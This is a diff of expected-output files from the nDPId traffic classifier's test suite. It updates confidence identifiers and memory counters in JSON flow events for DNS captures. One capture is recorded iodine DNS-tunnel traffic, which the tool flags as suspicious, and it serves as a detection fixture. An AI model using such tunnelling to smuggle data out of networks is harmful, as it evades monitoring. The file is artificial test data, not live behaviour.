00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1282356640051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1282356640051,"pkt":"CAAnnOC0CAAnx266CABFAABZAABAAEARImMKAAIUCgACHgA1rl8ARRoeErCEAAABAAEAAAAAC3ZhYWFha2FyZGxpBnBpcmF0ZQNzZWEAAAoAAcAMAAoAAQAAAAAACVZBQ0tEA8XpAQ=="} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":1,"num_answers":1,"reply_code":0,"query_type":10,"rsp_type":10,"rsp_addr":"0.0.0.0"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":1,"num_answers":1,"reply_code":0,"query_type":10,"rsp_type":10,"rsp_addr":"0.0.0.0"}} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1282356640051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1282356640051,"pkt":"CAAnx266CAAnnOC0CABFAABZAABAAEARImMKAAIeCgACFK5fADUARcobMN8BAAABAAAAAAAAIGxhZWdwdW1pcGxoaHB6MTJ5bmQxZWZsandsa2pjZ3d5BnBpcmF0ZQNzZWEAAAoAAQ=="} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":438,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1282356640051,"flow_last_seen":1282356664538,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1470,"flow_tot_l4_payload_len":52024,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1282356664538,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":438,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1282356640051,"flow_last_seen":1282356664538,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1470,"flow_tot_l4_payload_len":52024,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1282356664538,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":438,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","packets-captured":438,"packets-processed":434,"total-skipped-flows":0,"total-l4-payload-len":52024,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1282356664538} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 438/434 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882054 bytes -~~ total memory freed........: 5882054 bytes -~~ total allocations/frees...: 118549/118549 +~~ total memory allocated....: 6015688 bytes +~~ total memory freed........: 6015688 bytes +~~ total allocations/frees...: 121311/121311 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 473 chars ~~ json string max len.......: 919 chars diff --git a/test/results/dns_ambiguous_names.pcap.out b/test/results/dns_ambiguous_names.pcap.out index 499dabab8..bac652542 100644 --- a/test/results/dns_ambiguous_names.pcap.out +++ b/test/results/dns_ambiguous_names.pcap.out @@ -2,64 +2,64 @@ 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1625744123717} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123717,"flow_last_seen":1625744123717,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123717,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625744123717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1625744123717,"pkt":"ABshv2HAVASmitEsCABFAABS3sIAAEARfvYKyAILCAgICLz3ADUAPh0yZjEBIAABAAAAAAABCjQxLWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAQAAKRAAAAAAAAAA"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123717,"flow_last_seen":1625744123717,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123717,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123717,"flow_last_seen":1625744123717,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123717,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00814{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625744123759,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1625744123759,"pkt":"VASmitEsEL9IThY0CABFAAEwD4cAADwRUVQICAgICsgCCwA1vPcBHJeKZjGBgAABAAoAAAABCjQxLWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAcAMAAUAAQAAJNcAJgI0MRJjb3VyaWVyLXB1c2gtYXBwbGUDY29tBmFrYWRucwNuZXQAwDcABQABAAAAOwAgEmV1LW5vcnRoLWNvdXJpZXItNApwdXNoLWFwcGxlwE3AaQABAAEAAAARAAQROZKLwGkAAQABAAAAEQAEETmSisBpAAEAAQAAABEABBE5kofAaQABAAEAAAARAAQROZKIwGkAAQABAAAAEQAEETmSicBpAAEAAQAAABEABBE5koTAaQABAAEAAAARAAQROZKGwGkAAQABAAAAEQAEETmShQAAKQIAAAAAAAAA"} -00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1625744123759,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.146.139"}} +00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1625744123759,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.146.139"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123764,"flow_last_seen":1625744123764,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1625744123764,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625744123764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1625744123764,"pkt":"ABshv2HAVASmitEsCABFAABI3soAAEARfvgKyAILCAgICN\/KADUANB0owxkBIAABAAAAAAABBXRlYW1zBXNreXBlA2NvbQAAAQABAAApEAAAAAAAAAA="} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123764,"flow_last_seen":1625744123764,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1625744123764,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123764,"flow_last_seen":1625744123764,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1625744123764,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625744123792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1625744123792,"pkt":"VASmitEsEL9IThY0CABFAAB5Cy0AADwRVmUICAgICsgCCwA138oAZUD8wxmBgAABAAIAAAABBXRlYW1zBXNreXBlA2NvbQAAAQABwAwABQABAAAIAwAVBnMtMDAwMQhzLW1zZWRnZQNuZXQAwC0AAQABAAAAqAAEDWsDgAAAKQIAAAAAAAAA"} -00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744123792,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.3.128"}} +00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744123792,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.3.128"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123796,"flow_last_seen":1625744123796,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744123796,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1625744123796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1625744123796,"pkt":"ABshv2HAVASmitEsCABFAABM3uAAAEARft4KyAILCAgICN7bADUAOB0s27sBIAABAAAAAAABA2FwaQV0ZWFtcwVza3lwZQNjb20AAAEAAQAAKRAAAAAAAAAA"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123796,"flow_last_seen":1625744123796,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744123796,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123796,"flow_last_seen":1625744123796,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744123796,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1625744123823,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1625744123823,"pkt":"VASmitEsEL9IThY0CABFAADPnR4AADwRxB0ICAgICsgCCwA13tsAu9ue27uBgAABAAQAAAABA2FwaQV0ZWFtcwVza3lwZQNjb20AAAEAAcAMAAUAAQAADJMAHgl0ZWFtcy1hZmQOdHJhZmZpY21hbmFnZXIDbmV0AMAxAAUAAQAAAOwALxx0ZWFtcy1hZmQtdHJhZmZpY21hbmFnZXItbmV0BnMtMDAwNAhzLW1zZWRnZcBKwFsABQABAAAAjQACwHjAeAABAAEAAACNAAQ0ccKDAAApAgAAAAAAAAA="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1625744123823,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.131"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1625744123823,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.131"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123828,"flow_last_seen":1625744123828,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123828,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1625744123828,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1625744123828,"pkt":"ABshv2HAVASmitEsCABFAABO3ucAAEARftUKyAILCAgICLQ2ADUAOh0u7g0BIAABAAAAAAABCmFsdDItbXRhbGsGZ29vZ2xlA2NvbQAAAQABAAApEAAAAAAAAAA="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123828,"flow_last_seen":1625744123828,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123828,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123828,"flow_last_seen":1625744123828,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123828,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1625744123853,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1625744123853,"pkt":"VASmitEsEL9IThY0CABFAACB5h8AADwRe2oICAgICsgCCwA1tDYAbSCd7g2BgAABAAIAAAABCmFsdDItbXRhbGsGZ29vZ2xlA2NvbQAAAQABwAwABQABAABUXwAXBGFsdDINbW9iaWxlLWd0YWxrNAFswBfAMwABAAEAAAErAAStwsq8AAApAgAAAAAAAAA="} -00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744123853,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.202.188"}} +00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744123853,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.202.188"}} 